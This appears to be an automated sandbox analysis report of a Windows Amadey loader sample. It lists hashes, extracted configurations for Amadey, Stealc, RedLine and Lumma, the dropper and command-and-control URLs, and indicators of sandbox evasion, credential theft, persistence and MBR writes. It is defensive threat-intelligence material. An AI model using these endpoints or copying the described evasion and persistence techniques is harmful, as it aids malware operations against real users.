amadey | a41e94e71aa6a7134690f67909fab84e78b9b4cf515cecee5cb9ec558bd416fd

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
07-02-2025 05:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a41e94e71aa6a7134690f67909fab84e78b9b4cf515cecee5cb9ec558bd416fd.exe
Size

1.8MB
MD5

a10444829e13be882db6464255dc0082
SHA1

73e6651e812cf3e44df7124af78f2208ea288e91
SHA256

a41e94e71aa6a7134690f67909fab84e78b9b4cf515cecee5cb9ec558bd416fd
SHA512

de8cc0f27ca4c9ef411554ca5c6283ea150bca382b6f2a31016f419347d2fee5cc98695e81512a099a3a1db6ad3e548e42af7ab3755d0b00dee75b8cefca25cd
SSDEEP

49152://zvq83jOBXUjCT/1D4z0f0TwgrJNXI8rlHTOHy:/7q83KBkjs1D4zc0nrrY8pT

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

stealc

Botnet

reno

http://185.215.113.115

Attributes

url_path
/c4becf79229cb002.php

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

http://185.215.113.43

Attributes

install_dir
abc3bc1985
install_file
skotes.exe
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
url_paths
/Zu7JuNko/index.php

rc4.plain

Extracted

Family

redline

Botnet

cheat

103.84.89.222:33791

Extracted

Family

lumma

https://paleboreei.biz/api

https://rampnatleadk.click/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Gcleaner family
gcleaner
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
Redline family
redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 2 IoCs

resource	yara_rule
behavioral2/memory/4536-650-0x0000000000AC0000-0x0000000000F28000-memory.dmp	family_sectoprat
behavioral2/memory/4536-649-0x0000000000AC0000-0x0000000000F28000-memory.dmp	family_sectoprat

Sectoprat family
sectoprat
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

resource	yara_rule
behavioral2/memory/2988-4897-0x0000000000400000-0x0000000000704000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 5504 created 3448	5504	nAEqBMS.exe	56

Enumerates VirtualBox registry keys 2 TTPs 1 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF	b975ffa6a4.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 21 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempMNZ9GSNUGKJ7KFC3FWUVZTNCSINL6SD1.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	0dbd0563af.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	LEDL9O6ARTU6REUYW1D.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	47793d0d63.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1VB7gm8.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	b975ffa6a4.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	8f3db5c2ac.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	9HYL9MT78H11BEUBS5RS.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	488fc90ed3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	6af0e87655.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	RLXUGJJ4P6UUVWSQMYWO4338G4QO6.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	0b65663f1a.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	7fOMOTQ.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	e9df748b6f.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	a41e94e71aa6a7134690f67909fab84e78b9b4cf515cecee5cb9ec558bd416fd.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	FP3JIZ5VZ9A4351M35ROS.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	4310695878.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5f314d4fd6.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
149	1480	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1480	powershell.exe

Downloads MZ/PE file 23 IoCs

flow	pid	Process
34	1368	skotes.exe
34	1368	skotes.exe
34	1368	skotes.exe
42	2324	6af0e87655.exe
104	1368	skotes.exe
104	1368	skotes.exe
104	1368	skotes.exe
104	1368	skotes.exe
104	1368	skotes.exe
104	1368	skotes.exe
104	1368	skotes.exe
104	1368	skotes.exe
104	1368	skotes.exe
104	1368	skotes.exe
104	1368	skotes.exe
104	1368	skotes.exe
104	1368	skotes.exe
104	1368	skotes.exe
104	1368	skotes.exe
104	1368	skotes.exe
154	5144	0b65663f1a.exe
149	1480	powershell.exe
23	3204	a41e94e71aa6a7134690f67909fab84e78b9b4cf515cecee5cb9ec558bd416fd.exe

Uses browser remote debugging 2 TTPs 4 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
5432	chrome.exe
5504	chrome.exe
6180	chrome.exe
6332	chrome.exe

.NET Reactor proctector 6 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral2/files/0x000300000000070b-4878.dat	net_reactor
behavioral2/memory/5176-4892-0x0000000000360000-0x0000000000976000-memory.dmp	net_reactor
behavioral2/files/0x0005000000000735-4903.dat	net_reactor
behavioral2/memory/5092-4917-0x0000000000A30000-0x0000000000AEE000-memory.dmp	net_reactor
behavioral2/files/0x000300000001e0d2-5045.dat	net_reactor
behavioral2/memory/2916-5046-0x0000000000E60000-0x0000000000F1E000-memory.dmp	net_reactor

Checks BIOS information in registry 2 TTPs 42 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	e9df748b6f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	FP3JIZ5VZ9A4351M35ROS.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	0dbd0563af.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RLXUGJJ4P6UUVWSQMYWO4338G4QO6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	47793d0d63.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1VB7gm8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	488fc90ed3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5f314d4fd6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	0dbd0563af.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	LEDL9O6ARTU6REUYW1D.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7fOMOTQ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1VB7gm8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	b975ffa6a4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8f3db5c2ac.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5f314d4fd6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	a41e94e71aa6a7134690f67909fab84e78b9b4cf515cecee5cb9ec558bd416fd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	FP3JIZ5VZ9A4351M35ROS.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6af0e87655.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	0b65663f1a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	e9df748b6f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	LEDL9O6ARTU6REUYW1D.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4310695878.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	9HYL9MT78H11BEUBS5RS.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	0b65663f1a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	b975ffa6a4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4310695878.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6af0e87655.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RLXUGJJ4P6UUVWSQMYWO4338G4QO6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempMNZ9GSNUGKJ7KFC3FWUVZTNCSINL6SD1.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7fOMOTQ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	47793d0d63.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	a41e94e71aa6a7134690f67909fab84e78b9b4cf515cecee5cb9ec558bd416fd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	9HYL9MT78H11BEUBS5RS.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempMNZ9GSNUGKJ7KFC3FWUVZTNCSINL6SD1.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	488fc90ed3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8f3db5c2ac.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	FP3JIZ5VZ9A4351M35ROS.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	skotes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 36 IoCs

pid	Process
2948	9HYL9MT78H11BEUBS5RS.exe
2436	FP3JIZ5VZ9A4351M35ROS.exe
1368	skotes.exe
2324	6af0e87655.exe
4644	0dbd0563af.exe
4256	RLXUGJJ4P6UUVWSQMYWO4338G4QO6.exe
1248	3524c4f5e2.exe
2264	LEDL9O6ARTU6REUYW1D.exe
1864	d8c6daea9c.exe
3616	skotes.exe
1856	TempMNZ9GSNUGKJ7KFC3FWUVZTNCSINL6SD1.EXE
5144	0b65663f1a.exe
5588	af53YGc.exe
5680	af53YGc.exe
5692	af53YGc.exe
3648	7fOMOTQ.exe
4536	47793d0d63.exe
5648	L65uNi1.exe
5696	L65uNi1.exe
5944	1VB7gm8.exe
3356	e9df748b6f.exe
5504	nAEqBMS.exe
3764	skotes.exe
5176	cee440c820.exe
2436	cee440c820.exe
2988	cee440c820.exe
5092	c242083ae7.exe
5988	c242083ae7.exe
4364	c242083ae7.exe
6324	488fc90ed3.exe
6560	b975ffa6a4.exe
5624	8f3db5c2ac.exe
7032	4310695878.exe
2916	5720396bfa.exe
4876	5720396bfa.exe
5004	5f314d4fd6.exe

Identifies Wine through registry keys 2 TTPs 21 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	6af0e87655.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	0dbd0563af.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	47793d0d63.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	1VB7gm8.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	488fc90ed3.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	5f314d4fd6.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	9HYL9MT78H11BEUBS5RS.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	LEDL9O6ARTU6REUYW1D.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	TempMNZ9GSNUGKJ7KFC3FWUVZTNCSINL6SD1.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	e9df748b6f.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	b975ffa6a4.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	8f3db5c2ac.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	RLXUGJJ4P6UUVWSQMYWO4338G4QO6.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	4310695878.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	a41e94e71aa6a7134690f67909fab84e78b9b4cf515cecee5cb9ec558bd416fd.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	FP3JIZ5VZ9A4351M35ROS.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	0b65663f1a.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	7fOMOTQ.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3524c4f5e2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1069288001\\3524c4f5e2.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d8c6daea9c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1069289001\\d8c6daea9c.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6af0e87655.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1069286001\\6af0e87655.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0dbd0563af.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1069287001\\0dbd0563af.exe"	skotes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	5f314d4fd6.exe

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x0007000000023ccf-86.dat	autoit_exe
behavioral2/files/0x0007000000023cd6-114.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 21 IoCs

pid	Process
3204	a41e94e71aa6a7134690f67909fab84e78b9b4cf515cecee5cb9ec558bd416fd.exe
2948	9HYL9MT78H11BEUBS5RS.exe
2436	FP3JIZ5VZ9A4351M35ROS.exe
1368	skotes.exe
2324	6af0e87655.exe
4644	0dbd0563af.exe
4256	RLXUGJJ4P6UUVWSQMYWO4338G4QO6.exe
2264	LEDL9O6ARTU6REUYW1D.exe
3616	skotes.exe
1856	TempMNZ9GSNUGKJ7KFC3FWUVZTNCSINL6SD1.EXE
5144	0b65663f1a.exe
3648	7fOMOTQ.exe
4536	47793d0d63.exe
5944	1VB7gm8.exe
3356	e9df748b6f.exe
3764	skotes.exe
6324	488fc90ed3.exe
6560	b975ffa6a4.exe
5624	8f3db5c2ac.exe
7032	4310695878.exe
5004	5f314d4fd6.exe

Suspicious use of SetThreadContext 7 IoCs

description	pid	Process	procid_target
PID 5588 set thread context of 5692	5588	af53YGc.exe	131
PID 5648 set thread context of 5696	5648	L65uNi1.exe	139
PID 5176 set thread context of 2988	5176	cee440c820.exe	151
PID 5092 set thread context of 4364	5092	c242083ae7.exe	156
PID 5504 set thread context of 2964	5504	nAEqBMS.exe	161
PID 2916 set thread context of 4876	2916	5720396bfa.exe	167
PID 6324 set thread context of 5836	6324	488fc90ed3.exe	170

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\skotes.job	FP3JIZ5VZ9A4351M35ROS.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 7 IoCs

pid	pid_target	Process	procid_target
5868	5588	WerFault.exe	129
5864	5648	WerFault.exe	138
708	5144	WerFault.exe	128
5432	5176	WerFault.exe	149
6164	5092	WerFault.exe	154
5140	2988	WerFault.exe	151
828	2916	WerFault.exe	166

System Location Discovery: System Language Discovery 1 TTPs 45 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a41e94e71aa6a7134690f67909fab84e78b9b4cf515cecee5cb9ec558bd416fd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	47793d0d63.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b975ffa6a4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RLXUGJJ4P6UUVWSQMYWO4338G4QO6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	3524c4f5e2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	LEDL9O6ARTU6REUYW1D.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9HYL9MT78H11BEUBS5RS.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0dbd0563af.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	af53YGc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7fOMOTQ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1VB7gm8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cee440c820.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c242083ae7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FP3JIZ5VZ9A4351M35ROS.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4310695878.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d8c6daea9c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0b65663f1a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5f314d4fd6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e9df748b6f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c242083ae7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6af0e87655.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempMNZ9GSNUGKJ7KFC3FWUVZTNCSINL6SD1.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	af53YGc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	L65uNi1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	L65uNi1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nAEqBMS.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	3524c4f5e2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8f3db5c2ac.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cee440c820.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3524c4f5e2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	488fc90ed3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5720396bfa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5720396bfa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	b975ffa6a4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	b975ffa6a4.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
4660	taskkill.exe
4788	taskkill.exe
4904	taskkill.exe
2964	taskkill.exe
1812	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	firefox.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3248	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3204	a41e94e71aa6a7134690f67909fab84e78b9b4cf515cecee5cb9ec558bd416fd.exe
